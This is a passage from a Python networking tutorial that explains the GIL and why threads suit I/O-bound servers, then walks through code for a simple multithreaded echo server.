cannot take advantage of multiple cores for parallel computation. This is a cause of much contention; however, for us this is not so much of a problem. Even with the GIL present, threads that are blocking on I/O are still de-prioritized by the OS and put into the background, so threads that do have computational work to do can run instead. The following figure is a simplified illustration of this: The Waiting for GIL state is where a thread has sent or received some data and so is ready to come out of the blocking state, but another thread has the GIL, so the ready thread is forced to wait. In many network applications, including our echo and chat servers, the time spent waiting on I/O is much higher than the time spent processing data. As long as we don't have a very large number of connections (a situation we'll discuss later on when we come to event driven architectures), thread contention caused by the GIL is relatively low, and hence threading is still a suitable architecture for these network server applications. With this in mind, we're going to use multithreading rather than multiprocessing in our echo server. The shared data model will simplify the code that we'll need for allowing our chat clients to exchange messages with each other, and because we're I/O bound, we don't need processes for parallel computation. Another reason for not using processes in this case is that processes are more "heavyweight" in terms of the OS resources, so creating a new process takes longer than creating a new thread. Processes also use more memory. One thing to note is that if you need to perform an intensive computation in your network server application (maybe you need to compress a large file before sending it over the network), then you should investigate methods for running this in a separate process. Because of quirks in the implementation of the GIL, having even a single computationally intensive thread in a mainly I/O bound process when multiple CPU cores are available can severely impact the performance of all the I/O bound threads. For more details, go through the David Beazley presentations linked to in the following information box: Processes and threads are different beasts, and if you're not clear on the distinctions, it's worthwhile to read up. A good starting point is the Wikipedia article on threads, which can be found at http://en.wikipedia.org/wiki/Thread_(computing). A good overview of the topic is given in Chapter 4 of Benjamin Erb's thesis, which is available at http://berb.github.io/diploma-thesis/community/. Additional information on the GIL, including the reasoning behind keeping it in Python can be found in the official Python documentation at https://wiki.python.org/moin/GlobalInterpreterLock. You can also read more on this topic in Nick Coghlan's Python 3 Q&A, which can be found at http://python-notes.curiousefficiency.org/en/latest/python3/questions_and_answers.html#but-but-surely-fixing-the-gil-is-more-important-than-fixing-unicode. Finally, David Beazley has done some fascinating research on the performance of the GIL on multi-core systems. Two presentations of importance are available online. They give a good technical background, which is relevant to this article. These can be found at http://pyvideo.org/video/353/pycon-2010--understanding-the-python-gil---82 and at https://www.youtube.com/watch?v=5jbG7UKT1l4. A multithreaded echo server A benefit of the multithreading approach is that the OS handles the thread switches for us, which means we can continue to write our program in a procedural style. Hence we only need to make small adjustments to our server program to make it multithreaded, and thus, capable of handling multiple clients simultaneously. Create a new file called 1.3-echo_server-multi.py and add the following code to it: import threading import tincanchat HOST = tincanchat.HOST PORT = tincanchat.PORT def handle_client(sock, addr): """ Receive one message and echo it back to client, then close socket """ try: msg = tincanchat.recv_msg(sock) # blocks until received # complete message msg = '{}: {}'.format(addr, msg) print(msg) tincanchat.send_msg(sock, msg) # blocks until sent except (ConnectionError, BrokenPipeError): print('Socket error') finally: print('Closed connection to {}'.format(addr)) sock.close() if __name__ == '__main__': listen_sock = tincanchat.create_listen_socket(HOST, PORT) addr = listen_sock.getsockname() print('Listening on {}'.format(addr)) while True: client_sock,addr = listen_sock.accept() # Thread will run function handle_client() autonomously # and concurrently to this while loop thread = threading.Thread(target=handle_client, args=[client_sock, addr], daemon=True) thread.start() print('Connection from {}'.format(addr)) You can see that we've just imported an extra module and modified our main loop to run our handle_client() function in separate threads, rather than running it in the main thread. For each client that connects, we create a new thread that just runs the handle_client() function. When the thread blocks on a receive or send, the OS checks the other threads to see if they have come out of a blocking state, and if any have, then it switches to one of them. Notice that we have set the daemon argument in the thread constructor call to True. This will allow the program to exit if we hit ctrl - c without us having to explicitly close all of our threads first. If you try this echo server with multiple clients, then you'll see that a second client that connects and sends a message will immediately get a response. Summary We looked at how to develop network protocols while considering aspects such as the connection sequence, framing of the data on the wire, and the impact these choices will have on the architecture of the client and server programs. We worked through different architectures for network servers and clients, demonstrating the multithreaded models by writing a simple echo server. Resources for Article: Further resources on this subject: Importing Dynamic Data [article] Driving Visual Analyses with Automobile Data (Python) [article] Preparing to Build Your Own GIS Application [article]

0
0
10661

SQL Injection

Moving Further with NumPy Modules

Documents and Collections in Data Modeling with MongoDB

The pandas Data Structures

Symbolizers

Global Illumination

Code Style in Django

Developing Extensible Data Security

Defining Dependencies

Digging Deep into Requests

Trending Topics

Set Up MariaDB

Color and motion finding

Clustering

Flappy Swift

Client and Server Applications

Create a Free Account To Continue Reading

Sign in to activate your 7-day free access